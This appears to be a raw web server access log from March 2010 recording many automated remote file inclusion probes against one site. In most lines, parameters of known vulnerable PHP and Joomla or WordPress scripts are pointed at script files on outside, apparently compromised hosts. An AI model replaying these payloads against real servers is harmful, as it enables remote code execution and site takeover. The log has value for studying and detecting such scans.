123.143.29.250 - - [05/Mar/2010:08:15:16 -0800] "GET /bbs////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:08:15:16 -0800] "GET /logs/access.log//bbs////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:08:15:16 -0800] "GET /logs//bbs////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:08:15:25 -0800] "GET /logs/access_100219.log/sourcedir=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:08:16:06 -0800] "GET /logs/access_100205.log//bbs////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:16:26 -0800] "GET /logs/access_100201.log//appserv/www/appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:16:44 -0800] "GET /logs/access_100220.log%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:08:17:07 -0800] "GET /logs/access_100213.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:08:17:24 -0800] "GET /appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:08:17:24 -0800] "GET /logs/access_100209.log%20%20//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:08:17:24 -0800] "GET /logs//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:08:17:28 -0800] "GET /logs//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:08:17:28 -0800] "GET /logs/access_100209.log%20%20//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:08:17:28 -0800] "GET /appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:08:17:30 -0800] "GET /logs/access_100220.log%20%20//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:08:17:37 -0800] "GET /logs/access_100220.log%20%20//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:17:55 -0800] "GET /logs/access_100201.log//appserv/www/appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [05/Mar/2010:08:20:26 -0800] "GET /logs////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 200 4953 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [05/Mar/2010:08:20:26 -0800] "GET ///////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [05/Mar/2010:08:20:27 -0800] "GET /logs/access_100217.log%20%20////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:08:20:51 -0800] "GET /logs/access_100217.log%20%20////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:08:20:51 -0800] "GET /logs////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 200 4953 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:21:00 -0800] "GET /administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:21:00 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:21:00 -0800] "GET /logs//administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:21:17 -0800] "GET /logs/access_100205.log%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:08:21:33 -0800] "GET /logs/access_100209.log%20%20////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [05/Mar/2010:08:21:38 -0800] "GET /logs/access_100209.log%20%20////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:22:40 -0800] "GET /logs//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:22:40 -0800] "GET /appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:22:40 -0800] "GET /logs/access_100209.log%20%20//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:22:48 -0800] "GET /logs/access_100220.log%20%20//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:08:22:50 -0800] "GET /logs/admin.cropcanvas.php?cropimagedir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:08:22:50 -0800] "GET /logs/access_100203.log/admin.cropcanvas.php?cropimagedir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:08:22:50 -0800] "GET /admin.cropcanvas.php?cropimagedir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:23:54 -0800] "GET /logs/access_100209.log%20%20//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:23:54 -0800] "GET /logs//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:23:54 -0800] "GET /appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:24:00 -0800] "GET /logs/access_100220.log%20%20//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:08:24:26 -0800] "GET /logs/access_100131.log%20%20//about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:08:24:26 -0800] "GET /logs//about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:08:24:26 -0800] "GET /about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:24:36 -0800] "GET /administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:24:40 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:24:41 -0800] "GET /logs//administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:08:24:52 -0800] "GET /logs/access_100207.log%20%20//about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:08:26:56 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:08:26:56 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:08:26:56 -0800] "GET /logs/access_100213.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:08:27:12 -0800] "GET /ideal/forum/viewtopic.php?p=26225 HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
212.241.177.123 - - [05/Mar/2010:08:27:58 -0800] "GET /logs/access_100217.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [05/Mar/2010:08:27:59 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:08:28:04 -0800] "GET /logs//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:08:28:04 -0800] "GET /logs/access.log//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:08:28:04 -0800] "GET /libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:08:28:17 -0800] "GET /logs/access_100131.log//about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [05/Mar/2010:08:28:21 -0800] "GET /logs/access.log//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [05/Mar/2010:08:28:21 -0800] "GET /libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [05/Mar/2010:08:28:21 -0800] "GET /logs//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:08:28:53 -0800] "GET /logs/access.log//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:08:28:53 -0800] "GET /libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:08:28:53 -0800] "GET /logs//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:08:29:46 -0800] "GET /logs/access_100213.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:08:30:15 -0800] "GET /logs/access_100207.log//about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:08:30:42 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:08:30:48 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:08:30:48 -0800] "GET /logs/access_100130.log%20%20//inc/header.php/step_one.php?server_inc=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:08:30:48 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:08:30:50 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:08:30:50 -0800] "GET /logs/access_100130.log%20%20//inc/header.php/step_one.php?server_inc=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:08:30:50 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:08:31:24 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:08:32:29 -0800] "GET /logs/access_100217.log////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:08:32:39 -0800] "GET /logs/access_100130.log//inc/header.php/step_one.php?server_inc=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:08:32:45 -0800] "GET /logs/access_100130.log//inc/header.php/step_one.php?server_inc=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:08:32:58 -0800] "GET /logs/access_100209.log////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:08:33:43 -0800] "GET /libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:08:33:43 -0800] "GET /logs//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:08:33:43 -0800] "GET /logs/access.log%20%20//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:08:33:46 -0800] "GET /logs//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:08:33:46 -0800] "GET /libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:08:33:46 -0800] "GET /logs/access.log%20%20//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:08:34:16 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:08:34:16 -0800] "GET /logs/access_100217.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:08:34:17 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.808" "www.puaga.com"
222.239.227.209 - - [05/Mar/2010:08:34:22 -0800] "GET /logs//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [05/Mar/2010:08:34:22 -0800] "GET /libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [05/Mar/2010:08:34:22 -0800] "GET /logs/access.log%20%20//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:08:35:56 -0800] "GET /logs/access_100205.log%20%20//bbs////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:08:35:56 -0800] "GET /logs//bbs////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:08:35:56 -0800] "GET /bbs////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:08:35:57 -0800] "GET /logs/access_100201.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:08:36:22 -0800] "GET /logs/access_100219.log%20%20//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [05/Mar/2010:08:36:24 -0800] "GET /logs/access_100219.log%20%20//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:08:36:34 -0800] "GET /main.php?sayfa=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:08:36:34 -0800] "GET /logs//main.php?sayfa=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:08:36:34 -0800] "GET /logs/access_100129.log%20%20//main.php?sayfa=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [05/Mar/2010:08:36:40 -0800] "GET /logs/access_100219.log%20%20//libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:08:36:43 -0800] "GET /logs/access_100203.log%20%20//bbs////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [05/Mar/2010:08:38:13 -0800] "GET /logs/access_100217.log////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.79.149.146 - - [05/Mar/2010:08:38:57 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.40.142.66 - - [05/Mar/2010:08:38:57 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.40.142.66 - - [05/Mar/2010:08:38:57 -0800] "GET /logs/access_100219.log/convert/mvcw.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:08:40:04 -0800] "GET /logs/access_100202.log%20%20/send_reminders.php?includedir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:08:40:04 -0800] "GET /send_reminders.php?includedir=http://samen-crew.co.cc/media/sc1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:08:40:04 -0800] "GET /logs/send_reminders.php?includedir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [05/Mar/2010:08:40:42 -0800] "GET /logs/access_100209.log////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:08:40:54 -0800] "GET /logs/access_100202.log%20%20/send_reminders.php?includedir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:08:40:54 -0800] "GET /send_reminders.php?includedir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:08:40:54 -0800] "GET /logs/send_reminders.php?includedir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:08:40:57 -0800] "GET /logs/send_reminders.php?includedir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:08:40:57 -0800] "GET /send_reminders.php?includedir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:08:40:57 -0800] "GET /logs/access_100202.log%20%20/send_reminders.php?includedir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:08:42:49 -0800] "GET /logs/access_100211.log//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:08:42:49 -0800] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
